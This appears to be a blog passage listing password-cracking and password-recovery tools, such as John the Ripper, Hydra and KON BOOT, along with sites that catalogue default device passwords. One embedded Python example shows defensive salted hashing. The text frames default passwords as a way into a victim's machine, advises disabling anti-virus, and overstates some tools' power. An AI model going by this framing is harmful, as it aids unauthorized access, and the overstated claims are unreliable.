Whenever one is covered, you'll find a "click here" link to read more about that tool. For now let's take a first look at those tools.

L0phtCrack:
L0phtCrack was developed by L0pht Heavy Industries to reveal the security flaws in the Windows authentication system. It now lists itself as one of the best Windows-based password hacking tools. Its popularity is so high that nearly every password dumping tool dumps passwords in a L0phtCrack-compatible format or has an option to dump passwords for L0phtCrack. It attempts to crack Windows passwords from hashes, which can be obtained from standalone computers, networked devices or Active Directory. It supports various attack methods for getting a valid password, including dictionary-based attacks, rainbow tables, hybrid attacks and even brute force. If used with proper hardware there's no way any password can withstand its might. The best part is that it now supports cracking Linux and UNIX passwords too. You can download and use it for 15 days as a trial.
 
John The Ripper:
Currently known as the best password cracker available. It is a command line tool. Officially it supports several operating systems, including several versions of Linux and UNIX and practically all versions of Windows. If your OS is not supported you can download the source files and compile them to get a working tool. The best part of compiling from source is that the result is optimized to work better on your system. Its primary purpose is to detect weak UNIX, Linux and Windows passwords. Both free and pro versions are available and they are equally good. Please note that many anti-virus programs consider password cracking tools to be viruses or Trojans, and John The Ripper is no exception. I would advise you to use this tool on a system without an anti-virus program.

Brutus:
Brutus is a network brute force attack tool. It is a Windows-only tool but can also be used on many versions of Linux with the help of Wine and CrossOver. It works against the network services of remote systems and tries to get a password using dictionary-based, hybrid and brute force attacks. Officially it supports several protocols including HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP and many more. Even if a protocol is not supported, protocol support plug-ins are available. It's free, but the source code is not available.

THC Hydra:
Whenever you need a brute force attacker for a remote system, THC Hydra is always a tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Officially Windows is not supported, but you can run it in Cygwin, a UNIX emulator for Windows.

Rainbow Crack:
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.
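
From the defender's side, the precomputation described above only pays off when every account's hash is computed the same way. The following is an added example, not code from RainbowCrack or from the original post; it uses a plain lookup table (the simplest form of precomputation, not a chain-based rainbow table), a constructed candidate list, and hypothetical function names to show that a per-user salt with an iterated KDF makes a precomputed table useless.

```python
import hashlib
import hmac
import os

# Constructed candidate list standing in for the plaintext space a table covers.
CANDIDATES = ["123456", "password", "letmein", "qwerty", "dragon"]

def fast_hash(password: str) -> str:
    """Unsalted, single-pass hash: the storage scheme precomputation targets."""
    return hashlib.sha256(password.encode()).hexdigest()

def build_table(candidates):
    """Pay the hashing cost once; every later lookup is a dictionary read."""
    return {fast_hash(p): p for p in candidates}

def store_password(password: str, iterations: int = 100_000):
    """Hardened storage: random per-user salt plus an iterated KDF."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest

def verify_password(password: str, record) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt, iterations, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)

def audit(password: str = "letmein"):
    """Compare how both storage schemes hold up against the same table."""
    table = build_table(CANDIDATES)
    rec_a = store_password(password)
    rec_b = store_password(password)  # second user, same password
    return {
        "unsalted_recovered": table.get(fast_hash(password)),
        "salted_recovered": table.get(rec_a[2].hex()),
        "same_password_same_record": rec_a[2] == rec_b[2],
        "login_ok": verify_password(password, rec_a),
        "login_wrong": verify_password("qwerty", rec_a),
    }

if __name__ == "__main__":
    for key, value in audit().items():
        print(f"{key}: {value}")
```

Because each record carries its own random salt, a table would have to be rebuilt per account, which removes the advantage of computing it in advance.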

Solar Winds Engineers Toolset:
Not only is it one of the best enumeration and network monitoring tools, Solar Winds also stands out as a tool that can be used as an awesome password auditing tool. It has more than 20 system monitoring tools, along with identification of weak user accounts and passwords. A must-have tool for every Windows administrator.

Cain And Abel:
We usually boast that all the cool password cracking tools are available for UNIX only, but this one is an exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Above is the list of the best password cracking tools. Please note that it doesn't include wireless password crackers, because that is a different story; we will cover wireless password cracking tools later with wireless hacking. Thanks for reading.

Password Tools That May Come Handy In Need

We use several passwords every day, and sometimes it happens that we forget a password and badly need to access a system, tool or application that is protected by it.
Here we will discuss some password tools that may come in handy when you need them.

Note: When you use any password recovery or auditing tool, there is a 100% chance your anti-virus program will detect it as a Trojan or virus. So while using them please disable your anti-virus programs.

This utility reveals the database password of every password-protected mdb file that was created with Microsoft Access 95/97/2000/XP or with Jet Database Engine 3.0/4.0. It can be very useful if you forgot your Access database password and you want to recover it.

It is a small utility that can be used to recover forgotten password from Mozilla Firefox.

Asterisk logger reveals the password stored behind the asterisks in standard password boxes.

A software tool that can be used to remove password-based protections over PDF files, but you must know the owner password.

It's an online and free tool to remove password-protected permissions over PDF files.

Multi Password Recovery is a tool designed to extract passwords from more than 110 applications, including FTP clients, email clients, IRC clients, web browsers, messengers etc.

KON BOOT is currently known as the most powerful ISO password breaking tool, since it can not only bypass Windows passwords during log on but can also bypass Linux passwords during log on. The powerful feature of KON BOOT is that it neither asks for the password nor resets it: just boot with the CD and any OS installed on your hard disk will boot without asking for a password; reboot again and all passwords will remain intact.

When you enter your password on most sites, you see only asterisk signs. This feature is intended to protect your passwords; but sometimes this feature becomes more of a pain, rather than help. Password Spectator is a software that lets you see the actual password behind the asterisks. Best of all, Password Spectator is free to download.

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

Hack Using Default Password

Password hacking is a complicated stage in the hacking cycle, since it is not only the step that gives you access to the victim's PC but also marks the origin of real hacking. But before trying anything else, an attacker will always try to exploit the victim using the default password of a device the victim uses. An unchanged default password is always treated as a misconfiguration as far as hacking is concerned. At the very first stage an attacker may try to crack BIOS passwords, router passwords, switch passwords, dial-up passwords, modem passwords and the passwords of other networking and communication devices by using their default passwords. There are several sites available which store huge databases of default passwords. The following list shows some of them; the lists of passwords they store are more than sufficient, and if you have such a list you can breach any device with a default password.


As far as I know, http://www.defaultpassword.com/ is the biggest database of default passwords available online. You can browse through a list of thousands of manufacturers and their products. You can also search for a specific manufacturer and its device, and can contribute newer default passwords to the list.


In my view it is the second biggest and a much more accurately sorted default password database. It lists all vendors in alphabetical order. When you click on a vendor's name it shows you the device name, its default password and a few words of description about how to use it for an attack.


Whenever you want to find a default password I recommend trying this site first. You can easily search for passwords using their navigation. Searching their database takes hardly any effort, since you can search by vendor name, product name and even model number. Their database includes default passwords for equipment and software from many vendors including 3Com, Cisco, Nortel, IBM, HP, Compaq, Digital, D-link, Linksys, Oracle, Microsoft and many more.


It is a special database for searching router passwords: select the router manufacturer and press find password, and it will list all models along with their numbers, user names and passwords.

Some other sites that store default passwords.